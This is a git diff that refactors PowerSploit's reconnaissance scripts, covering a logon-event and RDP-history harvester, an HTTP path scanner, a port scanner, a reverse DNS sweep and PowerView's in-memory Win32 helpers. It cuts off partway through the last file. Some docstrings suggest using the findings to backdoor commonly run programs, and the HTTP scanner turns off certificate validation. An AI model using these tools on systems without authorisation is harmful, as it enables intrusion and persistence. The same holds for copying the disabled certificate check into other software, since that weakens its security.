 
-#### 'Get-MicrophoneAudio'
+#### `Get-MicrophoneAudio`
 
 Records audio from system microphone and saves to disk
 
diff --git a/Recon/Get-ComputerDetails.ps1 b/Recon/Get-ComputerDetail.ps1
index bd00deb..ef3720c 100644
--- a/Recon/Get-ComputerDetails.ps1
+++ b/Recon/Get-ComputerDetail.ps1
@@ -1,14 +1,14 @@
-function Get-ComputerDetails
+function Get-ComputerDetail
 {
 <#
 .SYNOPSIS
 
 This script is used to get useful information from a computer.
 
-Function: Get-ComputerDetails
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Get-ComputerDetail  
+Author: Joe Bialek, Twitter: @JosephBialek  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
@@ -25,14 +25,14 @@ Switch: Outputs the data as text instead of objects, good if you are using this
 	
 .EXAMPLE
 
-Get-ComputerDetails
+Get-ComputerDetail
 Gets information about the computer and outputs it as PowerShell objects.
 
-Get-ComputerDetails -ToString
+Get-ComputerDetail -ToString
 Gets information about the computer and outputs it as raw text.
 
 .NOTES
-This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. 
+This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
 You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
 
 .LINK
@@ -42,6 +42,7 @@ Github repo: https://github.com/clymb3r/PowerShell
 
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
     Param(
         [Parameter(Position=0)]
         [Switch]
@@ -50,14 +51,12 @@ Github repo: https://github.com/clymb3r/PowerShell
 
     Set-StrictMode -Version 2
 
-
-
     $SecurityLog = Get-EventLog -LogName Security
-    $Filtered4624 = Find-4624Logons $SecurityLog
-    $Filtered4648 = Find-4648Logons $SecurityLog
-    $AppLockerLogs = Find-AppLockerLogs
+    $Filtered4624 = Find-4624Logon $SecurityLog
+    $Filtered4648 = Find-4648Logon $SecurityLog
+    $AppLockerLogs = Find-AppLockerLog
     $PSLogs = Find-PSScriptsInPSAppLog
-    $RdpClientData = Find-RDPClientConnections
+    $RdpClientData = Find-RDPClientConnection
 
     if ($ToString)
     {
@@ -88,29 +87,29 @@ Github repo: https://github.com/clymb3r/PowerShell
 }
 
 
-function Find-4648Logons
+function Find-4648Logon
 {
 <#
 .SYNOPSIS
 
-Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the 
+Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
 the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
 for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
 
-Function: Find-4648Logons
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-4648Logon  
+Author: Joe Bialek, Twitter: @JosephBialek  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
-Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the 
+Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
 the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
 for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
 
 .EXAMPLE
 
-Find-4648Logons
+Find-4648Logon
 Gets the unique 4648 logon events.
 
 .NOTES
@@ -120,11 +119,12 @@ Gets the unique 4648 logon events.
 Blog: http://clymb3r.wordpress.com/
 Github repo: https://github.com/clymb3r/PowerShell
 #>
+
     Param(
         $SecurityLog
     )
 
-    $ExplicitLogons = $SecurityLog | Where {$_.InstanceID -eq 4648}
+    $ExplicitLogons = $SecurityLog | Where-Object {$_.InstanceID -eq 4648}
     $ReturnInfo = @{}
 
     foreach ($ExplicitLogon in $ExplicitLogons)
@@ -216,7 +216,7 @@ Github repo: https://github.com/clymb3r/PowerShell
     return $ReturnInfo
 }
 
-function Find-4624Logons
+function Find-4624Logon
 {
 <#
 .SYNOPSIS
@@ -224,10 +224,10 @@ function Find-4624Logons
 Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do
 network logons in to the server, what accounts RDP in, what accounts log in locally, etc...
 
-Function: Find-4624Logons
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-4624Logon  
+Author: Joe Bialek, Twitter: @JosephBialek  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
@@ -236,7 +236,7 @@ network logons in to the server, what accounts RDP in, what accounts log in loca
 
 .EXAMPLE
 
-Find-4624Logons
+Find-4624Logon
 Find unique 4624 logon events.
 
 .NOTES
@@ -250,7 +250,7 @@ Github repo: https://github.com/clymb3r/PowerShell
         $SecurityLog
     )
 
-    $Logons = $SecurityLog | Where {$_.InstanceID -eq 4624}
+    $Logons = $SecurityLog | Where-Object {$_.InstanceID -eq 4624}
     $ReturnInfo = @{}
 
     foreach ($Logon in $Logons)
@@ -362,17 +362,17 @@ Github repo: https://github.com/clymb3r/PowerShell
 }
 
 
-function Find-AppLockerLogs
+function Find-AppLockerLog
 {
 <#
 .SYNOPSIS
 
 Look through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run).
 
-Function: Find-AppLockerLogs
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-AppLockerLog  
+Author: Joe Bialek, Twitter: @JosephBialek  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
@@ -380,7 +380,7 @@ Look through the AppLocker logs to find processes that get run on the server. Yo
 
 .EXAMPLE
 
-Find-AppLockerLogs
+Find-AppLockerLog
 Find process creations from AppLocker logs.
 
 .NOTES
@@ -390,9 +390,10 @@ Find process creations from AppLocker logs.
 Blog: http://clymb3r.wordpress.com/
 Github repo: https://github.com/clymb3r/PowerShell
 #>
+
     $ReturnInfo = @{}
 
-    $AppLockerLogs = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where {$_.Id -eq 8002}
+    $AppLockerLogs = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 8002}
 
     foreach ($Log in $AppLockerLogs)
     {
@@ -434,10 +435,10 @@ Function Find-PSScriptsInPSAppLog
 Go through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log).
 You can then backdoor these scripts or do other malicious things.
 
-Function: Find-AppLockerLogs
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-AppLockerLog  
+Author: Joe Bialek, Twitter: @JosephBialek  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
@@ -456,12 +457,12 @@ Find unique PowerShell scripts being executed from the PowerShell operational lo
 Blog: http://clymb3r.wordpress.com/
 Github repo: https://github.com/clymb3r/PowerShell
 #>
+
     $ReturnInfo = @{}
-    $Logs = Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where {$_.Id -eq 4100}
+    $Logs = Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 4100}
 
     foreach ($Log in $Logs)
     {
-        $ContainsScriptName = $false
         $LogDetails = $Log.Message -split "`r`n"
 
         $FoundScriptName = $false
@@ -506,27 +507,26 @@ Github repo: https://github.com/clymb3r/PowerShell
 }
 
 
-Function Find-RDPClientConnections
+Function Find-RDPClientConnection
 {
 <#
 .SYNOPSIS
 
-Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user 
+Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user
 usually RDP's to.
 
-Function: Find-RDPClientConnections
-Author: Joe Bialek, Twitter: @JosephBialek
-Required Dependencies: None
-Optional Dependencies: None
+Function: Find-RDPClientConnection  
+Author: Joe Bialek, Twitter: @JosephBialek  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
-Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user 
-usually RDP's to.
+Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user usually RDP's to.
 
 .EXAMPLE
 
-Find-RDPClientConnections
+Find-RDPClientConnection
 Find unique saved RDP client connections.
 
 .NOTES
@@ -550,7 +550,7 @@ Github repo: https://github.com/clymb3r/PowerShell
         {
             $Server = $Server.PSChildName
             $UsernameHint = (Get-ItemProperty -Path "HKU:\$($UserSid)\Software\Microsoft\Terminal Server Client\Servers\$($Server)").UsernameHint
-                
+
             $Key = $UserSid + "::::" + $Server + "::::" + $UsernameHint
 
             if (!$ReturnInfo.ContainsKey($Key))
diff --git a/Recon/Get-HttpStatus.ps1 b/Recon/Get-HttpStatus.ps1
index 8b60306..b271efd 100644
--- a/Recon/Get-HttpStatus.ps1
+++ b/Recon/Get-HttpStatus.ps1
@@ -5,11 +5,11 @@ function Get-HttpStatus
 

 Returns the HTTP Status Codes and full URL for specified paths.

 

-PowerSploit Function: Get-HttpStatus

-Author: Chris Campbell (@obscuresec)

-License: BSD 3-Clause

-Required Dependencies: None

-Optional Dependencies: None

+PowerSploit Function: Get-HttpStatus  

+Author: Chris Campbell (@obscuresec)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None  

 

 .DESCRIPTION

 

@@ -42,7 +42,7 @@ C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
 .NOTES

 

 HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error

-    

+

 .LINK

 

 http://obscuresecurity.blogspot.com

@@ -64,49 +64,54 @@ http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
         [Switch]

         $UseSSL

     )

-    

+

     if (Test-Path $Path) {

-    

+

         if ($UseSSL -and $Port -eq 0) {

             # Default to 443 if SSL is specified but no port is specified

             $Port = 443

-        } elseif ($Port -eq 0) {

+        }

+        elseif ($Port -eq 0) {

             # Default to port 80 if no port is specified

             $Port = 80

         }

-    

+

         $TcpConnection = New-Object System.Net.Sockets.TcpClient

         Write-Verbose "Path Test Succeeded - Testing Connectivity"

-        

+

         try {

             # Validate that the host is listening before scanning

             $TcpConnection.Connect($Target, $Port)

-        } catch {

+        }

+        catch {

             Write-Error "Connection Test Failed - Check Target"

             $Tcpconnection.Close()

-            Return 

+            Return

         }

-        

+

         $Tcpconnection.Close()

-    } else {

+    }

+    else {

            Write-Error "Path Test Failed - Check Dictionary Path"

            Return

     }

-    

+

     if ($UseSSL) {

         $SSL = 's'

         # Ignore invalid SSL certificates

         [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }

-    } else {

+    }

+    else {

         $SSL = ''

     }

-    

+

     if (($Port -eq 80) -or ($Port -eq 443)) {

         $PortNum = ''

-    } else {

+    }

+    else {

         $PortNum = ":$Port"

     }

-    

+

     # Check Http status for each entry in the doctionary file

     foreach ($Item in Get-Content $Path) {

 

@@ -117,24 +122,23 @@ http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
             $WebRequest = [System.Net.WebRequest]::Create($URI)

             $WebResponse = $WebRequest.GetResponse()

             $WebStatus = $WebResponse.StatusCode

-            $ResultObject += $ScanObject

             $WebResponse.Close()

-        } catch {

+        }

+        catch {

             $WebStatus = $Error[0].Exception.InnerException.Response.StatusCode

-            

-            if ($WebStatus -eq $null) {

+

+            if (-not $WebStatus) {

                 # Not every exception returns a StatusCode.

                 # If that is the case, return the Status.

                 $WebStatus = $Error[0].Exception.InnerException.Status

             }

-        } 

-        

+        }

+

         $Result = @{ Status = $WebStatus;

                      URL = $WebTarget}

-        

+

         $ScanObject = New-Object -TypeName PSObject -Property $Result

-        

+

         Write-Output $ScanObject

-        

     }

 }

diff --git a/Recon/Invoke-Portscan.ps1 b/Recon/Invoke-Portscan.ps1
index 6f059e2..7e28709 100644
--- a/Recon/Invoke-Portscan.ps1
+++ b/Recon/Invoke-Portscan.ps1
@@ -5,11 +5,11 @@ function Invoke-Portscan
 
 Simple portscan module
 
-PowerSploit Function: Invoke-Portscan
-Author: Rich Lundeen (http://webstersProdigy.net)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Invoke-Portscan  
+Author: Rich Lundeen (http://webstersProdigy.net)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
@@ -114,7 +114,7 @@ Force Overwrite if output Files exist. Otherwise it throws exception
 
 .EXAMPLE
 
-C:\PS> Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50
+Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50
 
 Description
 -----------
@@ -122,7 +122,7 @@ Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and m
 
 .EXAMPLE
 
-C:\PS> echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
+echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
 
 Description
 -----------
@@ -130,7 +130,7 @@ Does a portscan of "webstersprodigy.net", and writes a greppable output file
 
 .EXAMPLE
 
-C:\PS> Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet
+Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet
 
 Description
 -----------
@@ -141,7 +141,13 @@ Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all
 http://webstersprodigy.net
 #>
 
-    [CmdletBinding()]Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseSingularNouns', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseLiteralInitializerForHashtable', '')]
+    [CmdletBinding()]
+    Param (
         #Host, Ports
         [Parameter(ParameterSetName="cmdHosts",
 
@@ -748,9 +754,9 @@ http://webstersprodigy.net
             #TODO deal with output
             Write-PortscanOut -comment $startMsg -grepStream $grepStream -xmlStream $xmlStream -readableStream $readableStream
 
-            #converting back from int array gives some argument error checking
-            $sPortList = [string]::join(",", $portList)
-            $sHostPortList = [string]::join(",", $hostPortList)
+            # #converting back from int array gives some argument error checking
+            # $sPortList = [string]::join(",", $portList)
+            # $sHostPortList = [string]::join(",", $hostPortList)
 
             ########
             #Port Scan Code - run on a per host basis
@@ -840,7 +846,6 @@ http://webstersprodigy.net
                         $sockets[$p] = new-object System.Net.Sockets.TcpClient
                     }
 
-                    
                     $scriptBlockAsString = @"
 
                         #somewhat of a race condition with the timeout, but I don't think it matters
@@ -885,8 +890,7 @@ http://webstersprodigy.net
                     $timeouts[$p].Enabled = $true
 
                     $myscriptblock = [scriptblock]::Create($scriptBlockAsString)
-                    $x = $sockets[$p].beginConnect($h, $p,(New-ScriptBlockCallback($myscriptblock)) , $null)
-
+                    $Null = $sockets[$p].beginConnect($h, $p,(New-ScriptBlockCallback($myscriptblock)) , $null)
                 }
 
                 function PortScan-Alive
diff --git a/Recon/Invoke-ReverseDnsLookup.ps1 b/Recon/Invoke-ReverseDnsLookup.ps1
index 5e811ee..36e6398 100644
--- a/Recon/Invoke-ReverseDnsLookup.ps1
+++ b/Recon/Invoke-ReverseDnsLookup.ps1
@@ -5,23 +5,23 @@ function Invoke-ReverseDnsLookup
 

 Perform a reverse DNS lookup scan on a range of IP addresses.

 

-PowerSploit Function: Invoke-ReverseDnsLookup

-Author: Matthew Graeber (@mattifestation)

-License: BSD 3-Clause

-Required Dependencies: None

-Optional Dependencies: None

- 

+PowerSploit Function: Invoke-ReverseDnsLookup  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None  

+

 .DESCRIPTION

 

-Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaisance prior to conducting an authorized penetration test.

- 

+Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test.

+

 .PARAMETER IPRange

 

 Specifies the IP address range. The range provided can be in the form of a single IP address, a low-high range, or a CIDR range. Comma-delimited ranges may can be provided.

- 

+

 .EXAMPLE

 

-C:\PS> Invoke-ReverseDnsLookup 74.125.228.0/29

+Invoke-ReverseDnsLookup 74.125.228.0/29

 

 IP              HostName

 --              --------

@@ -31,29 +31,29 @@ IP              HostName
 74.125.228.4    iad23s05-in-f4.1e100.net

 74.125.228.5    iad23s05-in-f5.1e100.net

 74.125.228.6    iad23s05-in-f6.1e100.net

- 

+

 Description

 -----------

 Returns the hostnames of the IP addresses specified by the CIDR range.

- 

+

 .EXAMPLE

 

-C:\PS> Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'

- 

+Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'

+

 IP              HostName

 --              --------

 74.125.228.1    iad23s05-in-f1.1e100.net

 74.125.228.4    iad23s05-in-f4.1e100.net

 74.125.228.5    iad23s05-in-f5.1e100.net

 74.125.228.6    iad23s05-in-f6.1e100.net

- 

+

 Description

 -----------

 Returns the hostnames of the IP addresses specified by the IP range specified.

 

 .EXAMPLE

 

-PS C:\> Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup

+Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup

 

 IP                                                          HostName

 --                                                          --------

@@ -69,13 +69,15 @@ Description
 -----------

 Returns the hostnames of the IP addresses piped from another source.

 

-  

 .LINK

 

 http://www.exploit-monday.com

 https://github.com/mattifestation/PowerSploit

 #>

 

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]

+    [CmdletBinding()]

     Param (

         [Parameter(Position = 0, Mandatory = $True,ValueFromPipeline=$True)]

         [String]

@@ -83,14 +85,14 @@ https://github.com/mattifestation/PowerSploit
     )

 

     BEGIN {

-    

+

         function Parse-IPList ([String] $IpRange)

         {

-        

+

             function IPtoInt

             {

                 Param([String] $IpString)

-            

+

                 $Hexstr = ""

                 $Octets = $IpString.Split(".")

                 foreach ($Octet in $Octets) {

@@ -98,7 +100,7 @@ https://github.com/mattifestation/PowerSploit
                 }

                 return [Convert]::ToInt64($Hexstr, 16)

             }

-        

+

             function InttoIP

             {

                 Param([Int64] $IpInt)

@@ -110,15 +112,15 @@ https://github.com/mattifestation/PowerSploit
                 }

                 return $IpStr.TrimEnd('.')

             }

-        

+

             $Ip = [System.Net.IPAddress]::Parse("127.0.0.1")

-        

+

             foreach ($Str in $IpRange.Split(","))

             {

                 $Item = $Str.Trim()

                 $Result = ""

                 $IpRegex = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"

-            

+

                 # First, validate the input

                 switch -regex ($Item)

                 {

@@ -139,11 +141,11 @@ https://github.com/mattifestation/PowerSploit
                     }

                     default

                     {

-                        Write-Warning "Inproper input"

+                        Write-Warning "Improper input"

                         return

                     }

                 }

-            

+

                 #Now, start processing the IP addresses

                 switch ($Result)

                 {

@@ -152,14 +154,14 @@ https://github.com/mattifestation/PowerSploit
                         $CidrRange = $Item.Split("/")

                         $Network = $CidrRange[0]

                         $Mask = $CidrRange[1]

-                    

+

                         if (!([System.Net.IPAddress]::TryParse($Network, [ref] $Ip))) { Write-Warning "Invalid IP address supplied!"; return}

                         if (($Mask -lt 0) -or ($Mask -gt 30)) { Write-Warning "Invalid network mask! Acceptable values are 0-30"; return}

-                    

+

                         $BinaryIP = [Convert]::ToString((IPtoInt $Network),2).PadLeft(32,'0')

                         #Generate lower limit (Excluding network address)

                         $Lower = $BinaryIP.Substring(0, $Mask) + "0" * ((32-$Mask)-1) + "1"

-                        #Generate upperr limit (Excluding broadcast address)

+                        #Generate upper limit (Excluding broadcast address)

                         $Upper = $BinaryIP.Substring(0, $Mask) + "1" * ((32-$Mask)-1) + "0"

                         $LowerInt = [Convert]::ToInt64($Lower, 2)

                         $UpperInt = [Convert]::ToInt64($Upper, 2)

@@ -168,21 +170,21 @@ https://github.com/mattifestation/PowerSploit
                     "range"

                     {

                         $Range = $item.Split("-")

-                    

+

                         if ([System.Net.IPAddress]::TryParse($Range[0],[ref]$Ip)) { $Temp1 = $Ip }

                         else { Write-Warning "Invalid IP address supplied!"; return }

-                    

+

                         if ([System.Net.IPAddress]::TryParse($Range[1],[ref]$Ip)) { $Temp2 = $Ip }

                         else { Write-Warning "Invalid IP address supplied!"; return }

-                    

+

                         $Left = (IPtoInt $Temp1.ToString())

                         $Right = (IPtoInt $Temp2.ToString())

-                    

+

                         if ($Right -gt $Left) {

                             for ($i = $Left; $i -le $Right; $i++) { InttoIP $i }

                         }

                         else { Write-Warning "Invalid IP range. The right portion must be greater than the left portion."; return}

-                    

+

                         break

                     }

                     "single"

@@ -193,28 +195,30 @@ https://github.com/mattifestation/PowerSploit
                     }

                     default

                     {

-                        Write-Warning "An error occured."

+                        Write-Warning "An error occurred."

                         return

                     }

                 }

             }

-        

         }

     }

-    

+

     PROCESS {

         Parse-IPList $IpRange | ForEach-Object {

             try {

                 Write-Verbose "Resolving $_"

                 $Temp = [System.Net.Dns]::GetHostEntry($_)

-            

+

                 $Result = @{

                     IP = $_

                     HostName = $Temp.HostName

                 }

-            

+

                 New-Object PSObject -Property $Result

-            } catch [System.Net.Sockets.SocketException] {}

+            }

+            catch [System.Net.Sockets.SocketException] {

+                Write-Verbose "Error: $_"

+            }

         }

     }

 }

diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1
index d35a9f0..83c1ae2 100755
--- a/Recon/PowerView.ps1
+++ b/Recon/PowerView.ps1
@@ -2,14 +2,14 @@
 
 <#
 
-    PowerSploit File: PowerView.ps1
-    Author: Will Schroeder (@harmj0y)
-    License: BSD 3-Clause
-    Required Dependencies: None
-    Optional Dependencies: None
+PowerSploit File: PowerView.ps1
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
 
 #>
 
+
 ########################################################
 #
 # PSReflect code for Windows API access
@@ -18,53 +18,54 @@
 #
 ########################################################
 
-function New-InMemoryModule
-{
+function New-InMemoryModule {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Creates an in-memory assembly and module
+Creates an in-memory assembly and module
 
-        Author: Matthew Graeber (@mattifestation)
-        License: BSD 3-Clause
-        Required Dependencies: None
-        Optional Dependencies: None
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
 
-    .DESCRIPTION
+.DESCRIPTION
 
-        When defining custom enums, structs, and unmanaged functions, it is
-        necessary to associate to an assembly module. This helper function
-        creates an in-memory module that can be passed to the 'enum',
-        'struct', and Add-Win32Type functions.
+When defining custom enums, structs, and unmanaged functions, it is
+necessary to associate to an assembly module. This helper function
+creates an in-memory module that can be passed to the 'enum',
+'struct', and Add-Win32Type functions.
 
-    .PARAMETER ModuleName
+.PARAMETER ModuleName
 
-        Specifies the desired name for the in-memory assembly and module. If
-        ModuleName is not provided, it will default to a GUID.
+Specifies the desired name for the in-memory assembly and module. If
+ModuleName is not provided, it will default to a GUID.
 
-    .EXAMPLE
+.EXAMPLE
 
-        $Module = New-InMemoryModule -ModuleName Win32
+$Module = New-InMemoryModule -ModuleName Win32
 #>
 
-    Param
-    (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [CmdletBinding()]
+    Param (
         [Parameter(Position = 0)]
         [ValidateNotNullOrEmpty()]
         [String]
         $ModuleName = [Guid]::NewGuid().ToString()
     )
 
-    $LoadedAssemblies = [AppDomain]::CurrentDomain.GetAssemblies()
+    $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())
+    $LoadedAssemblies = $AppDomain.GetAssemblies()
 
-    ForEach ($Assembly in $LoadedAssemblies) {
+    foreach ($Assembly in $LoadedAssemblies) {
         if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {
             return $Assembly
         }
     }
 
     $DynAssembly = New-Object Reflection.AssemblyName($ModuleName)
-    $Domain = [AppDomain]::CurrentDomain
+    $Domain = $AppDomain
     $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')
     $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)
 
@@ -74,16 +75,14 @@ function New-InMemoryModule
 
 # A helper function used to reduce typing while defining function
 # prototypes for Add-Win32Type.
-function func
-{
-    Param
-    (
+function func {
+    Param (
         [Parameter(Position = 0, Mandatory = $True)]
         [String]
         $DllName,
 
         [Parameter(Position = 1, Mandatory = $True)]
-        [String]
+        [string]
         $FunctionName,
 
         [Parameter(Position = 2, Mandatory = $True)]
@@ -102,6 +101,9 @@ function func
         [Runtime.InteropServices.CharSet]
         $Charset,
 
+        [String]
+        $EntryPoint,
+
         [Switch]
         $SetLastError
     )
@@ -116,6 +118,7 @@ function func
     if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }
     if ($Charset) { $Properties['Charset'] = $Charset }
     if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }
+    if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint }
 
     New-Object PSObject -Property $Properties
 }
@@ -124,123 +127,133 @@ function func
 function Add-Win32Type
 {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Creates a .NET type for an unmanaged Win32 function.
+Creates a .NET type for an unmanaged Win32 function.
 
-        Author: Matthew Graeber (@mattifestation)
-        License: BSD 3-Clause
-        Required Dependencies: None
-        Optional Dependencies: func
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: func
 
-    .DESCRIPTION
+.DESCRIPTION
 
-        Add-Win32Type enables you to easily interact with unmanaged (i.e.
-        Win32 unmanaged) functions in PowerShell. After providing
-        Add-Win32Type with a function signature, a .NET type is created
-        using reflection (i.e. csc.exe is never called like with Add-Type).
+Add-Win32Type enables you to easily interact with unmanaged (i.e.
+Win32 unmanaged) functions in PowerShell. After providing
+Add-Win32Type with a function signature, a .NET type is created
+using reflection (i.e. csc.exe is never called like with Add-Type).
 
-        The 'func' helper function can be used to reduce typing when defining
-        multiple function definitions.
+The 'func' helper function can be used to reduce typing when defining
+multiple function definitions.
 
-    .PARAMETER DllName
+.PARAMETER DllName
 
-        The name of the DLL.
+The name of the DLL.
 
-    .PARAMETER FunctionName
+.PARAMETER FunctionName
 
-        The name of the target function.
+The name of the target function.
 
-    .PARAMETER ReturnType
+.PARAMETER EntryPoint
 
-        The return type of the function.
+The DLL export function name. This argument should be specified if the
+specified function name is different than the name of the exported
+function.
 
-    .PARAMETER ParameterTypes
+.PARAMETER ReturnType
 
-        The function parameters.
+The return type of the function.
 
-    .PARAMETER NativeCallingConvention
+.PARAMETER ParameterTypes
 
-        Specifies the native calling convention of the function. Defaults to
-        stdcall.
+The function parameters.
 
-    .PARAMETER Charset
+.PARAMETER NativeCallingConvention
 
-        If you need to explicitly call an 'A' or 'W' Win32 function, you can
-        specify the character set.
+Specifies the native calling convention of the function. Defaults to
+stdcall.
 
-    .PARAMETER SetLastError
+.PARAMETER Charset
 
-        Indicates whether the callee calls the SetLastError Win32 API
-        function before returning from the attributed method.
+If you need to explicitly call an 'A' or 'W' Win32 function, you can
+specify the character set.
 
-    .PARAMETER Module
+.PARAMETER SetLastError
 
-        The in-memory module that will host the functions. Use
-        New-InMemoryModule to define an in-memory module.
+Indicates whether the callee calls the SetLastError Win32 API
+function before returning from the attributed method.
 
-    .PARAMETER Namespace
+.PARAMETER Module
 
-        An optional namespace to prepend to the type. Add-Win32Type defaults
-        to a namespace consisting only of the name of the DLL.
+The in-memory module that will host the functions. Use
+New-InMemoryModule to define an in-memory module.
 
-    .EXAMPLE
+.PARAMETER Namespace
 
-        $Mod = New-InMemoryModule -ModuleName Win32
+An optional namespace to prepend to the type. Add-Win32Type defaults
+to a namespace consisting only of the name of the DLL.
 
-        $FunctionDefinitions = @(
-          (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),
-          (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),
-          (func ntdll RtlGetCurrentPeb ([IntPtr]) @())
-        )
+.EXAMPLE
 
-        $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
-        $Kernel32 = $Types['kernel32']
-        $Ntdll = $Types['ntdll']
-        $Ntdll::RtlGetCurrentPeb()
-        $ntdllbase = $Kernel32::GetModuleHandle('ntdll')
-        $Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')
+$Mod = New-InMemoryModule -ModuleName Win32
 
-    .NOTES
+$FunctionDefinitions = @(
+  (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),
+  (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),
+  (func ntdll RtlGetCurrentPeb ([IntPtr]) @())
